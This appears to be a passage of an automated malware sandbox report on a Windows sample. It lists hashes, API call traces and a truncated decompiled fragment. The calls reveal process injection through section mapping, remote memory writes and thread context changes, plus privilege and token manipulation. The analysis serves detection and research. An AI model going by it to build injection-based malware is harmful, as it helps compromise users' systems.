  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2B66, Relevance: 5.2, APIs: 4, Instructions: 156 Total matches: 79memory
Similarity
  • Total matches: 79
  • API ID: CloseHandleGetLastErrorHeapFreememset
  • String ID:
  • API String ID: 1419005916-0
  • Opcode ID: 760449bbfbed289788199d7c06102e71ba99187f66d499b3f37ec5349a85ff82
  • Instruction ID: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
  • Opcode Fuzzy Hash: 4C1189C5015BD382E6772E01A8A0F60D2429F86B76E4EA731C4BF745DE3D802024B776
  • Instruction Fuzzy Hash: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
APIs
    • Part of subcall function 001C24B7: lstrlen.KERNEL32(001C2246,?,00000000,00000000,001C2B9B,00000000,001C2246,?,00000000,?), ref: 001C24C1
    • Part of subcall function 001C24B7: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C24D6
    • Part of subcall function 001C24B7: HeapFree.KERNEL32(00000000,00000000,001C71E8), ref: 001C251D
  • memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
  • CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2A39: RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C2A39: CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C164D: RtlImageNtHeader.NTDLL(?), ref: 001C165E
    • Part of subcall function 001C164D: RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
    • Part of subcall function 001C164D: GetTickCount.KERNEL32 ref: 001C169C
    • Part of subcall function 001C164D: wsprintfA.USER32 ref: 001C16AC
    • Part of subcall function 001C164D: RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
    • Part of subcall function 001C164D: StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
    • Part of subcall function 001C164D: lstrlen.KERNEL32(00000000), ref: 001C1702
    • Part of subcall function 001C164D: RegCloseKey.ADVAPI32(?), ref: 001C171E
    • Part of subcall function 001C164D: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
    • Part of subcall function 001C1A08: RtlImageNtHeader.NTDLL ref: 001C1A48
    • Part of subcall function 001C1A08: GetCurrentThreadId.KERNEL32 ref: 001C1A5E
    • Part of subcall function 001C1A08: GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
    • Part of subcall function 001C1A08: RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
    • Part of subcall function 001C1A08: wsprintfA.USER32 ref: 001C1B50
    • Part of subcall function 001C1A08: lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
    • Part of subcall function 001C1586: RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
    • Part of subcall function 001C1586: GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
    • Part of subcall function 001C1586: StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
    • Part of subcall function 001C1586: wsprintfA.USER32 ref: 001C15D0
    • Part of subcall function 001C1586: CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
    • Part of subcall function 001C1586: GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
    • Part of subcall function 001C1586: WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
    • Part of subcall function 001C1586: GetLastError.KERNEL32 ref: 001C1615
    • Part of subcall function 001C1586: CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C1586: GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
    • Part of subcall function 001C1586: HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
    • Part of subcall function 001CB8EF: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 001CB919
    • Part of subcall function 001CB8EF: HeapFree.KERNEL32(00000000,00000000), ref: 001CB968
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C1E86: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
    • Part of subcall function 001C1E86: RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001C1E86: lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001C1E86: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001C1EFC: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1F04
    • Part of subcall function 001C2416: lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
    • Part of subcall function 001C2416: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
    • Part of subcall function 001C2416: lstrcpy.KERNEL32(00000008,?), ref: 001C2462
    • Part of subcall function 001C2416: CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
    • Part of subcall function 001C2416: CloseHandle.KERNEL32(00000000), ref: 001C2485
    • Part of subcall function 001C2416: GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
    • Part of subcall function 001C2416: HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
  • GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
    • Part of subcall function 001C1473: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001C1473: wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001C1473: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D87D7, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE2F9, Relevance: 5.1, APIs: 4, Instructions: 70 Total matches: 113string
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Process Name: crypmgmt.exe Analysis ID: 63143

General

Root Process Name:d3d8sext.exe
Process MD5:39E01E2F5A5FBFECA5ABC01131E7E3A1
Total matches:140
Initial Analysis Report:Open
Initial sample Analysis ID:63143
Initial sample SHA 256:9F7B02032349637F0D8C962DAB2F08F0E3269C295AC0DE385C60274E89390D4B
Initial sample name:01.exe

Similar Executed Functions

Function 01B31CB2, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195 Total matches: 38native
Similarity
  • Total matches: 38
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID: pnls
  • API String ID: 82859500-141991303
  • Opcode ID: 0e930324d983736687636c65484061bdc5c26c6a22796dc9d5b5e2d04a25d73d
  • Instruction ID: 4054d890b24571a5ce529a27dba078d21a52d3d947ce336da07b5894b94e827b
  • Opcode Fuzzy Hash: 7821C045058D4286DDE3B8960613F97E142FF43F88C9CFBA4B49A6669F0E04311AEB4F
  • Instruction Fuzzy Hash: 4054d890b24571a5ce529a27dba078d21a52d3d947ce336da07b5894b94e827b
APIs
    • Part of subcall function 01B3278F: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
    • Part of subcall function 01B3278F: memset.NTDLL ref: 01B3280F
    • Part of subcall function 01B3278F: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
    • Part of subcall function 01B3278F: NtClose.NTDLL(?), ref: 01B3283F
  • memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
  • memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31B66: GetModuleHandleA.KERNEL32(01B380DB,?,CCCCFEEB,01B31E8C,?,?,?,00000000), ref: 01B31B99
    • Part of subcall function 01B31B66: memcpy.NTDLL(?,3!?w,00000018,01B3845C,01B38400,01B38451), ref: 01B31C04
  • memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B339A5: memset.NTDLL ref: 01B339C4
    • Part of subcall function 01B31C13: memcpy.NTDLL(CCCCFEEB,01B37478,00000018,CCCCFEEB,01B3845C,CCCCFEEB,01B38400,CCCCFEEB,01B38451,CCCCFEEB,01B31E84,?,01B323F9,?,?,00000000), ref: 01B31CA4
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
  • CloseHandle.KERNEL32(00000000), ref: 01B31EE0
  • memset.NTDLL ref: 01B31EF4
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
    • Part of subcall function 01B3284E: memcpy.NTDLL(-00000004,00000004,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 01B328AE
    • Part of subcall function 01B3284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 01B328C3
    • Part of subcall function 01B3284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?), ref: 01B32905
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001CDA13, Relevance: 10.6, APIs: 7, Instructions: 111 Total matches: 36string
Similarity
  • Total matches: 36
  • API ID: CreateEventGetLastErrorRtlAddVectoredExceptionHandlerRtlRemoveVectoredExceptionHandlerStrRChr_struprlstrlen
  • String ID:
  • API String ID: 1244505096-0
  • Opcode ID: e7bdade24c4945e58ca902ffe0c9ca2f3df43dc30c200f231c9832c7f3637fe3
  • Instruction ID: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
  • Opcode Fuzzy Hash: 0AF099380984018E452FA8A8581471E4B0CB4827DB68C7F17FDE81006E5F4FF0E05FA9
  • Instruction Fuzzy Hash: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
APIs
  • StrRChrA.SHLWAPI(001EB090,00000000,0000005C), ref: 001CDA47
  • _strupr.NTDLL ref: 001CDA5D
  • lstrlen.KERNEL32(001EB090,?,001EC638), ref: 001CDA65
    • Part of subcall function 001D99D2: NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
    • Part of subcall function 001D99D2: NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
    • Part of subcall function 001D99D2: memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001D99D2: NtClose.NTDLL(001EC638), ref: 001D9A84
    • Part of subcall function 001D99D2: NtClose.NTDLL(?), ref: 001D9A8E
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,001EC638), ref: 001CDAE5
  • RtlAddVectoredExceptionHandler.NTDLL(00000000,001CD036), ref: 001CDB0C
    • Part of subcall function 001CD519: memset.NTDLL ref: 001CD561
    • Part of subcall function 001CD519: CreateMutexA.KERNEL32(00000000,00000001,00000000,0000005C,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD59C
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD5A7
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(001EB020), ref: 001CD5BF
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CD617
    • Part of subcall function 001CD519: NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 001CD65C
    • Part of subcall function 001CD519: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD671
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD67B
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(00000000), ref: 001CD689
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000018), ref: 001CD716
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD79E
    • Part of subcall function 001CD519: LoadLibraryA.KERNEL32(001EC000), ref: 001CD7A9
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000071), ref: 001CD821
    • Part of subcall function 001CD519: wsprintfA.USER32 ref: 001CD849
  • GetLastError.KERNEL32(?,?,?,001EC638), ref: 001CDB26
  • RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CDB3C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D99D2, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B33880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 57d5b69842fa9f20cc0ac7374aaf72f9f3e4042206c472131978e9752df15512
  • Instruction ID: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
  • Opcode Fuzzy Hash: 09F078400B9F90E6E812A68604A2F406692FF06E75E0EE32475F211B8A3F12311D8B06
  • Instruction Fuzzy Hash: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
APIs
  • memset.NTDLL ref: 01B338A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 01B33995
    • Part of subcall function 01B33E68: NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
    • Part of subcall function 01B33E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
    • Part of subcall function 01B33E68: SetLastError.KERNEL32(00000000), ref: 01B33EA7
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
  • memcpy.NTDLL(00000218,01B34F92,00000100,?,00010003,?,?,00000318,00000008), ref: 01B3391D
    • Part of subcall function 01B33E27: NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
    • Part of subcall function 01B33E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
    • Part of subcall function 01B33E27: SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 01B33974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33977
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B3278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001F1040, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 226 Total matches: 134native
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Function 01B33E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 09b8888f5fea2438ba07c33a5d99fafd9b808ca60c6c542fde1a50af119b8c2c
  • Instruction ID: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
  • Opcode Fuzzy Hash: 42C012800D5D81E6957F54890169A165197BB91600C3D73363184AD5807FA032190F09
  • Instruction Fuzzy Hash: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
APIs
  • NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
  • SetLastError.KERNEL32(00000000), ref: 01B33EA7
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: 153371e7e4f27683f8f1e7324a073917f20e70acda51c493c57c8daf0af629c8
  • Instruction ID: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
  • Opcode Fuzzy Hash: 09C09BC7021DC54DD779698201B5C45C1C57EB177243C710D5054DD31D518931274E85
  • Instruction Fuzzy Hash: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
  • SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 36b500c4af3d78682ecbfd6e0cb23a776f8586d0295add1c103b4d2a2a554bea
  • Instruction ID: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
  • Opcode Fuzzy Hash: 9EC09B87020DC54DD779694101B9C45C0C57FB177243C710D5058DD31D518931274F85
  • Instruction Fuzzy Hash: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
  • SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
